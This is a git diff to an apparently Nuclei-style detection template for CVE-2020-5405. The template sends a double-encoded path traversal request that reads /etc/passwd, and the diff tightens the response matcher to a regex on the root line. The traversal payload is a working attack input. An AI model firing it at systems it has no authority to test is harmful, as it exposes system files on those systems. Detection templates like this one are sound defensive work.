diff --git a/cves/CVE-2020-5405.yaml b/cves/CVE-2020-5405.yaml index 9871bd3ef8..45deb19edc 100644 --- a/cves/CVE-2020-5405.yaml +++ b/cves/CVE-2020-5405.yaml @@ -11,11 +11,12 @@ requests: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' - + matchers-condition: and matchers: - type: status status: - 200 - - type: word - words: - - "root:" + - type: regex + regex: + - "root:[x*]:0:0:" + part: body